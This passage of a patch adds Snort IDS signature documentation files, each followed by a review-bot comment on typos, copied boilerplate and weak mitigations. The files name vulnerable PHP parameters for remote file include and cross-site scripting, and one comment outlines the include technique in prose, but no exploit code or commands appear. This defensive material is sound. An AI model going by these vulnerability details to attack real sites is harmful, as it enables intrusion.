+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
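Review bot: nothing in this file says what rule 1120 actually matches; the Summary, Detailed Information and Attack Scenarios are all generic web-server boilerplate ("the attack scenarios are legion"), so a reader cannot judge the alert. Add the specific URI or request pattern the rule looks for, as 1518.txt does with nstelemetry.adp.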
--- /dev/null
+++ b/doc/signatures/1409.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1409
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string 
+buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 
+of a vulnerable device, causing a Denial of Service or possible execution of 
+arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
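Review bot: the Corrective Action "use SNMP v2 protocol as an alternative" is weak advice, because SNMPv2c still authenticates with plaintext community strings; recommend SNMPv3 with authentication, or at least restricting SNMP to the management network as the ingress/egress filtering line already suggests. Minor: "Several network devices come pre-installed" should be "Many network devices ship", "buffer overflow, that will allow" should drop the comma, and the line after "Any implementation of SNMP v1 protocol" contains only a tab.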
--- /dev/null
+++ b/doc/signatures/100000426.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000426
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotClear" application running on a webserver. Access to the file "prepend.php" using a remote file being passed as the "blog_dc_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "blog_dc_path" parameter in the "prepend.php" script used by the "DotClear" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotClear
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
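Review bot: the file starts with two blank "+" lines before "Rule:" and ends with a trailing blank "+" line; trim both so it matches the other files. "ona web server" should be "on a web server", and the Attack Scenarios text about supplying credentials to an authentication mechanism does not describe a remote file include through "blog_dc_path"; describe the include-path request instead.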
--- /dev/null
+++ b/doc/signatures/2049.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2049
+
+--
+Summary:
+a MS-SQL database.
+
+--
+Impact:
+Disclosure of an instance of MS-SQL running on a host.
+
+--
+Detailed Information:
+nessus is being used to query for the existance of a MS-SQL database 
+running on a host. This may be the prelude to an attack against the 
+service.
+
+--
+Affected Systems:
+All systems running MS-SQL.
+
+--
+Attack Scenarios:
+This is a probe, the attacker merely needs to use nessus to search the 
+target for services.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Use a firewall to deny connections to port 1434.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10674
+
+--
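Review bot: the Summary is truncated to "a MS-SQL database."; the beginning of the sentence is missing and should read along the lines of "This event is generated when Nessus probes for the existence of a MS-SQL database." "existance" in Detailed Information should be "existence", "nessus" should be capitalized as "Nessus", and Corrective Action should say whether port 1434 means TCP or UDP, since the firewall rule differs.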
--- /dev/null
+++ b/doc/signatures/378.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+378
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Ping-O-Meter software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Ping-O-Meter software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS164
+
+--
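Review bot: the Corrective Action "+Block inbound ICMP echo requests." is too broad as written; the False Positives section of the same file concedes that echo requests are used to legitimately troubleshoot networks, so the recommendation should be scoped to the perimeter (drop echo requests from untrusted networks, keep them inside). Typo in False Positives: "legimately" should be "legitimately". Detailed Information should also say what is distinctive about the Ping-O-Meter payload, since that is what the rule keys on and what an analyst needs in order to confirm a hit from the packet.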
--- /dev/null
+++ b/doc/signatures/2290.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2290
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
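Review bot: the Attack Scenarios text ("+An attacker can access an authentication mechanism and supply his/her" / "+own credentials to gain access.") does not match the vulnerability described in Detailed Information, which is about unchecked user input allowing PHP code execution, file inclusion and retrieval of sensitive files; it reads as copied boilerplate. Suggest replacing it with a scenario in which the attacker supplies crafted input to the affected Advanced Poll script. A rule that names a specific product and version (Proxy2.de Advanced Poll 2.0.2) should also carry an advisory under Additional References instead of an empty section, and the comma splice "user input, this may lead" should be split into two sentences.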
--- /dev/null
+++ b/doc/signatures/1503.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1503
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
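Review bot: the Affected Systems section is empty ("+Affected Systems:" followed directly by "+--"); every other file in this patch populates it, and an analyst triaging the event needs to know which server or application the rule targets. The Summary and Detailed Information are also fully generic ("a web server or an application running on that server"), so the specific resource that SID 1503 matches should be named. Typo in Detailed Information: "ona web server" should be "on a web server".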
--- /dev/null
+++ b/doc/signatures/2021.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2021
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+dismounted via UDP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
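Review bot: the Summary ("+The RPC service mountd enables clients to connect to networked file" / "+dismounted via UDP.") is ungrammatical and does not say what the event is; the rest of the file makes clear it is an unmount request. Suggest "This event is generated when an attempt is made to unmount a network share via the RPC mountd service over UDP." The Attack Scenarios paragraph then runs two distinct cases together, denial of service by remotely unmounting a share and reconnaissance of RPC services; stating them as two sentences would make the Impact section ("Denial of network resources") easier to reconcile with the probe case.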
--- /dev/null
+++ b/doc/signatures/2465.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2465
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
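Review bot: "+None known." under False Positives is not credible for a rule that fires on access to administrative shares; Detailed Information says the event triggers on access to "private or administrative shares", and administrators connect to those from management hosts as a matter of routine (backup, software deployment, remote administration). Suggest noting that as a known false positive and advising a pass rule for the management systems. Typo in Attack Scenarios: "adminsitrative" should be "administrative". The Summary says the access is "using Samba", but Affected Systems also lists Windows file and print sharing, so the protocol name (SMB) is more accurate than the name of one implementation.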
--- /dev/null
+++ b/doc/signatures/100000782.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000782
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "url" parameter in the "go.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
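Review bot: the Impact section overstates a cross-site scripting bug: "+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases." and the second Detailed Information paragraph about executing system binaries are server-compromise boilerplate, while Attack Scenarios correctly describes the real effect (a malicious link that steals information from the user who clicks it). Suggest rewriting Impact around script execution in the victim's browser and theft of session data, and dropping the system-binaries paragraph. Also "+All systems running CGI applications using Horde" should simply be "All systems running Horde", and the "--" separators after Sid and Affected Systems lack the blank line used elsewhere in the patch.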
--- /dev/null
+++ b/doc/signatures/100000548.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000548
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "forum_admin.php" using a remote file being 
+passed as the "DragonRootPath" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "forum_admin.php" 
+script used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
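Review bot: the third Detailed Information paragraph ("+This event is generated when an attempt is made to gain unauthorized access to" through "credentials of a client host") and the Attack Scenarios text about supplying credentials to an authentication mechanism describe a different class of bug than the one this rule covers; the first paragraph already states the actual issue, a remote file passed as "DragonRootPath" to "forum_admin.php". Suggest removing the credential boilerplate and having Attack Scenarios describe an attacker hosting a PHP file on a server they control and supplying its URL in that parameter so the application includes and executes it. Also "exploitation attempt has been attempted" in the Summary is redundant, and "ona web server" should be "on a web server".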
--- /dev/null
+++ b/doc/signatures/100000841.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000841
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PerForms" application running on a webserver. Access to the file "performs.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "performs.php" script used by the "PerForms" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PerForms
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
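Review bot: the Corrective Action ("+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.") is the only mitigation offered for a remote file include, which leaves nothing to do when no fix is available. Suggest adding the configuration-level mitigation: disable remote URL inclusion in the PHP interpreter (the allow_url_include and allow_url_fopen directives) so that a URL passed in "mosConfig_absolute_path" cannot be fetched and executed, and restrict outbound HTTP from the web server. Same wording problems as the sibling files: "exploitation attempt has been attempted" and "ona web server".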
--- /dev/null
+++ b/doc/signatures/553.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+553
+
+--
+Summary: 
+The event is generated when an attempt is made to log on to an FTP server with the username of "anonymous".
+
+--
+Impact: 
+Information gathering or remote access.  This activity may be a precursor to navigating through the accessible directories on the anonymous FTP server to do reconnaissance of the server.  Alternately, this may be a precursor of attempting an exploit, such as a buffer overflow, that may permit remote access to the vulnerable FTP server.
+
+--
+Detailed Information: 
+FTP servers may permit anonymous user access to share authorized public files.  FTP servers must have tighly restricted permissions to prevent anonymous users from navigating or writing to unauthorized directories.  If permissions are incorrectly assigned, an attacker may attempt to store unauthorized "warez" files of pirated software.  Alternately, anonymous access to a vulnerable FTP server may permit an attacker to exploit a buffer overflow, permitting execution of arbitrary commands on the host.
+
+--
+Affected Systems: 
+FTP servers allowing anonymous user access
+
+--
+Attack Scenarios: 
+An attacker may employ anonymous user access to do reconnaissance, store unauthorized files, or attempt an exploit on a vulnerable FTP server. 
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+If anonymous user access is knowingly permitted, this rule may fire.  Consider disabling this rule to anonymous FTP server.
+
+--
+False Negatives: 
+An attacker may use the username "ftp" instead of "anonymous" to gain anonymous access.
+
+--
+Corrective Action: 
+Disable anonymous access on the FTP server if it is not required.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
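Review bot: the second sentence of False Positives ("+... Consider disabling this rule to anonymous FTP server.") is missing words and is unclear; suggest "Consider disabling this rule, or adding a pass rule, for hosts that intentionally offer anonymous FTP." The False Negatives section notes that a login as "ftp" achieves the same anonymous access, which argues for the rule (or a companion SID) matching that username as well; worth recording as an open item rather than leaving it as a documented gap. Typo in Detailed Information: "tighly" should be "tightly".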
--- /dev/null
+++ b/doc/signatures/2577.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2577
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft Internet Explorer.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle the validation of data from
+an external source when processing data in a frame from a redirected
+source. This may lead to the execution of arbitrary code in the context
+of the Local Machine zone.
+
+It may be possible for an attacker to supply an HTTP 300 response from a
+webserver that points to a local file on the victim host. If the
+attacker includes code of their choosing, this code is executed in the
+context of the trusted Local Machine zone.
+
+--
+Affected Systems:
+	Microsoft Internet Explorer
+	Microsoft Outlook
+	Microsoft Outlook Express
+
+--
+Attack Scenarios:
+An attacker would need to supply an HTTP 300 series code to redirect the
+contents of a frame to a local resource on the victim host.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+A valid 300 server response that uses the Location parameter to redirect
+users to a new location may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Disable Active Scripting and ActiveX
+
+Disable the use of HTML email
+
+Use a browser other than Internet Explorer
+
+--
+Contributors:
+Original Snort documentation contributed by nnposter@users.sourceforge.net
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
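Review bot: Detailed Information says "+It may be possible for an attacker to supply an HTTP 300 response from a" while Attack Scenarios says "+An attacker would need to supply an HTTP 300 series code to redirect the"; HTTP 300 is one specific status (Multiple Choices), and the redirect behaviour comes from the 3xx class with a Location header, which is what the False Positives section refers to. Suggest using "3xx redirect response with a Location header" consistently. Affected Systems lists Outlook and Outlook Express without saying why; a sentence that they render HTML with the Internet Explorer engine would justify both that list and the "Disable the use of HTML email" mitigation. A vulnerability this specific should also have a vendor advisory under Additional References.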
--- /dev/null
+++ b/doc/signatures/449.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+449
+
+--
+Summary:
+This event is generated when a routing device detects that a packet has exceeded the maximum number of allowable hops. 
+
+--
+Impact:
+Informational.  This indicates that a packet has been expired by an internal router.  This may be an indication of an attacker attempting a traceroute of a host in your network. 
+
+--
+Detailed Information:
+Each packet is assigned an initial Time To Live (TTL) value before being sent.  This value is usually determined by the operating system of the given TCP/IP stack.  The TTL value represents the maximum number of hops a packet may take before being expired by a routing device.  This is done to banish lost or misguided packets from the network.  The traceroute utility assigns its own TTL values to dictate the number of hops a packet takes, to discover all the routing devices that are traversed by a packet.  During the process, an ICMP "Time Exceeded in Transit" message may be observed. If a router in your network sends this message, it may be an indication that an attacker is attempting a traceroute of a host in your network.
+
+--
+Affected Systems:
+Any device that expires a packet will generate this ICMP message.
+
+--
+Attack Scenarios:
+An attacker may attempt a traceroute to discover your routing devices and network topology.
+
+--
+Ease of Attack:
+Simple. The UNIX traceroute and Windows tracert are provided utilities.
+
+--
+False Positives:
+It is possible to observe an ICMP "Time Exceeded in Transit" message sent outbound if any inbound packet has exceeded the maximum allowable hops.  This may be a indication of a lost packet or routing problems such as a routing loop.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Sites may elect to disable this ICMP message on the outbound interface to prevent releasing potentially value reconnaissance about the network topology.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
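Review bot: "+... to prevent releasing potentially value reconnaissance about the network topology." should read "potentially valuable". The same Corrective Action deserves a caveat: silencing outbound "Time Exceeded in Transit" at the perimeter also hides the routing-loop and lost-packet symptoms that the False Positives section says this message reveals, and breaks traceroute for your own operators, so it should be presented as a trade-off rather than a default. Minor: Impact says the packet was expired by "an internal router" while the Summary says "a routing device"; the rule cannot know where the router sits, so "a router in your network", as used in Detailed Information, is the consistent phrasing.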
--- /dev/null
+++ b/doc/signatures/2141.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2141
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the php application shoutbox. 
+
+--
+Impact:
+Information gathering possible execution of arbitrary code and remote access to the host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in the php application shoutbox. Specifically the rule generates an event when directory traversal is attempted.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the host. The attacker might then gain administrator access to the host or execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
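Review bot: "+Any host using php." under Affected Systems is far too broad; the Summary and Detailed Information tie the rule to directory traversal in "the php application shoutbox", so Affected Systems should name that application (and the affected versions, if known), not every PHP host. The application name should be given in its proper form with a version, and Additional References is empty although a specific product vulnerability is being described. Format nit: "+Sid: 2141" puts the value on the heading line, whereas the other files in this patch place it on the following line.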
--- /dev/null
+++ b/doc/signatures/1103.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+1103
+--
+Summary:
+This event is generated when a client is requesting a file that may 
+contain an administrator name and password.
+
+--
+Impact:
+An attacker may be able to gain administrator access to your web server.
+
+--
+Detailed Information:
+Some versions of Netscape Enterprise Server  put a world readable text 
+file containing the administrator user name and encrypted password in a 
+standard location within the URI space. By acessing this, an attacker 
+may be able to brute force guess or even decrypt the password.
+
+--
+Affected Systems:
+	Netscape Enterprise/3.6 SP3
+	Netscape Fasttrack/3.0.2
+	Netscape Messaging Server/3.6
+	Netscape Messaging Server/4.15p2
+	Netscape Collabra Server/3.54
+
+--
+Attack Scenarios:
+This is an information gathering operation that could allow an attacker 
+to execute a brute force password guessing attack.
+
+--
+Ease of Attack:
+Moderate.   The file is easy enough to get access to, but the password 
+is still encrypted.
+
+--
+False Positives:
+None.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Set appropriate permissions on this file or upgrade your web server 
+software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Secureiteam
+http://www.securiteam.com/securitynews/5OR040A1UG.html
+
+--
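Review bot: Detailed Information says the file sits "+... in a" / "+standard location within the URI space." but never gives the path, which is exactly what an analyst needs to verify a hit against web server logs; suggest stating the URI the rule matches. "+None." under False Positives should be "None known." for consistency with the other files, and "+Secureiteam" in Additional References should be "SecuriTeam". The "Rule:" and "Sid:" blocks at the top of the file lack the blank lines before "--" used elsewhere in the patch.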
--- /dev/null
+++ b/doc/signatures/100000406.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000406
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "approb.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
